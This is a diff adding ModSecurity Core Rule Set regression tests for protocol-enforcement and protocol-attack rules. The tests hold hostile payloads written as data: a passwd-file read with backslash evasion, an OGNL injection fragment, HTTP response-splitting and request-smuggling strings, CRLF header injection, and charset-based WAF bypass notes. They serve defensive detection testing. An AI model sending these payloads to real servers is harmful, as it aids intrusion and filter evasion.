- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: "300"
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /dump.rdb
version: HTTP/1.1
output:
log_contains: id "920440"

112
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml Normal file
View File

@@ -0,0 +1,112 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920450.yaml"
description: "Description"
tests:
-
test_title: 920450-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-range: "test"
output:
log_contains: "id \"920450\""
-
test_title: 920450-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
If: "test"
output:
log_contains: "id \"920450\""
-
test_title: 920450-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
lock-token: "test"
output:
log_contains: "id \"920450\""
-
test_title: 920450-4
desc: HTTP header is restricted by policy (920450) from old modsec regressions, we no longer block proxy-connection in 3.0
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
no_log_contains: id "920450"
-
test_title: 920450-5
desc: HTTP header is restricted by policy (920450) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Lock-Token: <opaquelocktoken
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920450"
-
test_title: 920450-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "test"
output:
no_log_contains: "id \"920450\""

83
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml Normal file
View File

@@ -0,0 +1,83 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920460.yaml"
description: "Description"
tests:
-
test_title: 920460-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
uri: "/"
headers:
Host: "localhost"
Accept: "*/*"
Content-Length: 22
Content-Type: "application/x-www-form-urlencoded"
User-Agent: "ModSecurity CRS 3 Tests"
data: 'file=cat+/etc/\passw\d'
stop_magic: true
output:
log_contains: "id \"920460\""
-
test_title: 920460-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?file=cat+/etc/pa\\ssw\\d"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920460\""
-
test_title: 920460-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?file=\\c"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920460\""
-
test_title: 920460-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?file=\\\\c"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920460\""
-
test_title: 920460-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?file=\\\\\\c"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920460\""

199
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml Normal file
View File

@@ -0,0 +1,199 @@
---
meta:
author: "lifeforms, Franziska Bühler"
enabled: true
name: "920470.yaml"
description: "Content-Type header format checks"
tests:
- test_title: 920470-1
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "%{(#nike='multipart/form-data').(#dm=@ognl"
Content-Length: 0
output:
log_contains: "id \"920470\""
- test_title: 920470-2
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'text/plain; charset="UTF-8"; garbage'
Content-Length: 0
output:
log_contains: "id \"920470\""
- test_title: 920470-3
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'text/plain; charset=/gar/bage'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-4
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "text/plain"
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-5
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'text/plain; charset=UTF-8'
output:
no_log_contains: "id \"920470\""
- test_title: 920470-6
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'text/plain; charset="UTF-8"'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-7
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/form-data; boundary=----WebKitFormBoundary12345'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-8
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'application/json'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-9
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/form-data; boundary=----formdata-polyfill-0.40616634299_704013'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-10
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/mixed; boundary=-----boundary_data:55780(123,45:667)+part'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-11
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/mixed; boundary= gc0p4Jq0M2Yt,08/jU534c0p?==:test'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-12
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/form-data; boundary= test_data_123456'
Content-Length: 0
output:
log_contains: "id \"920470\""
- test_title: 920470-13
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/related; type="application/xop+xml"; boundary="uuid:a111aaa1-aa11-1a11-a11a-11a1111aa11a"; start="<root.message@cxf.apache.org>"; start-info="application/soap+xml'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-14
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'application/soap+xml; action="urn:hl7-org:v3:PRPA_IN201305UV02"; charset=UTF-8'
Content-Length: 0
output:
no_log_contains: "id \"920470\""

240
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml Normal file
View File

@@ -0,0 +1,240 @@
---
meta:
author: "lifeforms"
enabled: true
name: "920480.yaml"
description: "Description"
tests:
- test_title: 920480-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=utf-8"
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded;charset=UTF-8"
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded;charset=iso-8859-1"
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded;charset=ISO-8859-15"
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=windows-1252"
data: "test=value"
output:
no_log_contains: "id \"920480\""
# TODO: this case is not yet handled by 3.1, future work
# - test_title: 920480-6
# stages:
# - stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# method: "POST"
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "localhost"
# Content-Type: "application/x-www-form-urlencoded; charset=UTF-80" #trailing garbage after 'UTF-8'
# data: "test=value"
# output:
# log_contains: "id \"920480\""
- test_title: 920480-7
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=garbage"
data: "test=value"
output:
log_contains: "id \"920480\""
- test_title: 920480-8
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded;charset=garbage"
data: "test=value"
output:
log_contains: "id \"920480\""
# TODO: this test should pass (works with curl), to be researched
# - test_title: 920480-9
# stages:
# - stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# method: "POST"
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "localhost"
# Content-Type: "application/x-www-form-urlencoded; charset=ibm037" # https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour slide 32
# data: "test=value"
# output:
# log_contains: "id \"920480\""
# TODO: this test should pass (works with curl), to be researched
# - test_title: 920480-10
# stages:
# - stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# method: "POST"
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "localhost"
# Content-Type: "application/x-www-form-urlencoded;charset=ibm037" # https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour slide 32
# data: "test=value"
# output:
# log_contains: "id \"920480\""
- test_title: 920480-11
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
# random other IBM charset
Content-Type: "application/x-www-form-urlencoded;charset=ibm038"
data: "test=value"
output:
log_contains: "id \"920480\""
# TODO: this case is not yet checked by CRS, future work
# - test_title: 920480-12
# stages:
# - stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# method: "POST"
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "localhost"
# Content-Type: "application/x-www-form-urlencoded;charset=utf-8;charset=ibm037" #double charset may cause evasion
# data: "test=value"
# output:
# log_contains: "id \"920480\""
# TODO: this case is not yet checked by CRS, future work
# - test_title: 920480-13
# stages:
# - stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# method: "POST"
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "localhost"
# Content-Type: "application/x-www-form-urlencoded;charset=ibm037;charset=UTF-8" #double charset may cause evasion
# data: "test=value"
# output:
# log_contains: "id \"920480\""
- test_title: 920480-14
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
# random other IBM charset
Content-Type: "application/x-www-form-urlencoded; charset=\"utf-8\""
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-15
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
# random other IBM charset
Content-Type: "application/x-www-form-urlencoded; charset='utf-8'"
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-16
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
# random other IBM charset
Content-Type: "application/x-www-form-urlencoded; charset=\"garbage\""
data: "test=value"
output:
log_contains: "id \"920480\""

51
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml Normal file
View File

@@ -0,0 +1,51 @@
---
meta:
author: "Christian Folini"
enabled: true
name: "920490.yaml"
description: "Tests for the charset protection in combination with the x-up-devcap-post-charset header"
tests:
- test_title: 920490-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "UP ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=utf-8"
x-up-devcap-post-charset: "ibm500"
data: "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7"
output:
log_contains: "id \"920490\""
- test_title: 920490-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=utf-8"
x-up-devcap-post-charset: "ibm500"
data: "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7"
output:
no_log_contains: "id \"920490\""
- test_title: 920490-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "UP ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=utf-8"
data: "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7"
output:
no_log_contains: "id \"920490\""

49
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml Normal file
View File

@@ -0,0 +1,49 @@
---
meta:
author: "Andrea Menin"
enabled: true
name: "920500.yaml"
description: "Tests for backup or working file extensions"
tests:
- test_title: 920500-1
desc: "Check request filename ends with ~"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/index.php~"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920500\""
- test_title: 920500-2
desc: "Check request filename contains file that ends with ~ but not at end of string (bypass)"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/index.php~/foo/bar/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920500\""
- test_title: 920500-3
desc: "Rules 920500 should not block user dir such as /~user/"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/~user/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920500\""

97
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml Normal file
View File

@@ -0,0 +1,97 @@
---
meta:
author: "Andrea Menin"
enabled: true
name: "920510.yaml"
description: "Cache-Control directives whitelist"
tests:
- test_title: 920510-1
desc: "block request with a response cache-control directive in request"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "private"
output:
log_contains: "id \"920510\""
- test_title: 920510-2
desc: "block request with an invalid cache-control directive in request"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "foo=bar"
output:
log_contains: "id \"920510\""
- test_title: 920510-3
desc: "block request with an invalid cache-control directive in request with multiple directives"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "max-age=1, foo=bar"
output:
log_contains: "id \"920510\""
- test_title: 920510-4
desc: "block request with an invalid cache-control syntax in request with multiple directives"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "max-age=1,,,max-stale=2"
output:
log_contains: "id \"920510\""
- test_title: 920510-5
desc: "allow request with valid cache-control single directive"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "no-cache"
output:
no_log_contains: "id \"920510\""
- test_title: 920510-6
desc: "allow request with valid cache-control multiple directive"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "max-age=123, max-stale, no-cache"
output:
no_log_contains: "id \"920510\""

146
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml Normal file
View File

@@ -0,0 +1,146 @@
---
meta:
author: "Christian S.J. Peron, Franziska Bühler"
description: None
enabled: true
name: 921110.yaml
tests:
-
test_title: 921110-1
desc: "HTTP Response Splitting"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=%0aPOST / HTTP/1.0"
version: HTTP/1.0
output:
log_contains: id "921110"
-
test_title: 921110-2
desc: "HTTP Response Splitting"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=aaa%0aGET+/+HTTP/1.1"
version: HTTP/1.0
output:
log_contains: id "921110"
-
test_title: 921110-3
desc: "HTTP Response Splitting"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=aaa%0dHEAD+http://example.com/+HTTP/1.1"
version: HTTP/1.0
output:
log_contains: id "921110"
-
test_title: 921110-4
desc: "HTTP Response Splitting"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=aaa%0d%0aGet+/foo%0d"
version: HTTP/1.0
output:
log_contains: id "921110"
-
test_title: 921110-5
desc: "HTTP Response Splitting"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=aaa%0d%0aGet+foo+bar"
version: HTTP/1.0
output:
no_log_contains: id "921110"
-
test_title: 921110-6
desc: HTTP Request Smuggling bypass with Content-Type text/plain
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Accept: "*/*"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Type: text/plain
Content-Length: 36
method: POST
port: 80
uri: /
data: "barGET /a.html HTTP/1.1\r\nSomething: GET /b.html HTTP/1.1\r\nHost: foo.com\r\nUser-Agent: foo\r\nAccept: */*\r\n\r\n"
output:
log_contains: id "921110"
-
test_title: 921110-7
desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Accept: "*/*"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2
output:
log_contains: id "921110"
-
test_title: 921110-8
desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/3
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Accept: "*/*"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2
output:
log_contains: id "921110"

70
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml Normal file
View File

@@ -0,0 +1,70 @@
---
meta:
author: csanders-git, Franziska Bühler
description: None
enabled: true
name: 921120.yaml
tests:
-
test_title: 921120-1
desc: HTTP response splitting (921120) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>
version: HTTP/1.1
output:
log_contains: id "921120"
-
test_title: 921120-2
desc: "HTTP Response splitting attack"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: "/file.jsp?somevar=foobar%0d%0aContent-Length:%2002343432423<html>ftw</html>"
version: HTTP/1.1
output:
log_contains: id "921120"
-
test_title: 921120-3
desc: "Fix FP issue 1615. Header followed by word chars."
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: "/file.jsp?somevar=%0A%0Dlocation:%0A%0D"
version: HTTP/1.1
output:
no_log_contains: id "921120"

83
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml Normal file
View File

@@ -0,0 +1,83 @@
---
meta:
author: "csanders-git, Franziska Bühler"
description: None
enabled: true
name: 921130.yaml
tests:
-
test_title: 921130-1
desc: HTTP response splitting (921130) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E
version: HTTP/1.1
output:
log_contains: id "921130"
-
test_title: 921130-2
desc: "HTTP Response splitting attack: cookie data"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cookie: "oreo=munchmuch%0d%0a%0d%0a<HTML><title></title></HTML>"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: "/"
output:
log_contains: id "921130"
-
test_title: 921130-3
desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Accept: "*/*"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2
output:
log_contains: id "921130"
-
test_title: 921130-4
desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/3
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Accept: "*/*"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2
output:
log_contains: id "921130"

40
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml Normal file
View File

@@ -0,0 +1,40 @@
---
meta:
author: "Christian S.J. Peron"
enabled: true
name: "921140.yaml"
description: "Tests for protocol based attacks"
tests:
-
test_title: 921140-1
desc: "HTTP Header Injection Attack via headers"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
SomeHeader: "Headerdata\rInjectedHeader: response_splitting_code"
uri: "/"
output:
status: 400
no_log_contains: "id:921140"
-
test_title: 921140-2
desc: "HTTP Header Injection Attack via headers"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
SomeHeader: "Headerdata%0dInjectedHeader: response_splitting_code"
uri: "/"
output:
no_log_contains: "id:921140"

23
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml Normal file
View File

@@ -0,0 +1,23 @@
---
meta:
author: "Christian S.J. Peron"
enabled: true
name: "921150.yaml"
description: "Tests for protocol based attacks"
tests:
-
test_title: 921150-1
desc: "HTTP Header Injection Attack via payload"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script.jsp?variableX=bar&variable2=Y&%0d%0restofdata"
output:
log_contains: "id \"921150\""

87
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml Normal file
View File

@@ -0,0 +1,87 @@
---
meta:
author: "Christian S.J. Peron"
enabled: true
name: "921160.yaml"
description: "Tests for protocol based attacks"
tests:
-
test_title: 921160-1
desc: "HTTP Header Injection Attack via payload: w/header, invalid line break, newlines after key"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0Remote-addr%0d%0d%0d:%20foo.bar.com"
output:
log_contains: id "921160"
-
test_title: 921160-2
desc: "HTTP Header Injection Attack via payload: w/header, correct line break, newlines after key"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr%0d%0d%0d:%20foo.bar.com"
output:
log_contains: id "921160"
-
test_title: 921160-3
desc: "HTTP Header Injection Attack via payload: w/header"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr:%20foo.bar.com"
output:
log_contains: id "921160"
-
test_title: 921160-4
desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in value rather than key"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script_rule921160.jsp?variableX=bar&variable2=%0d%0aRemote-addr:%20foo.bar.com"
output:
log_contains: id "921160"
-
test_title: 921160-5
desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in key rather than value"
stages:
-
stage:
input:
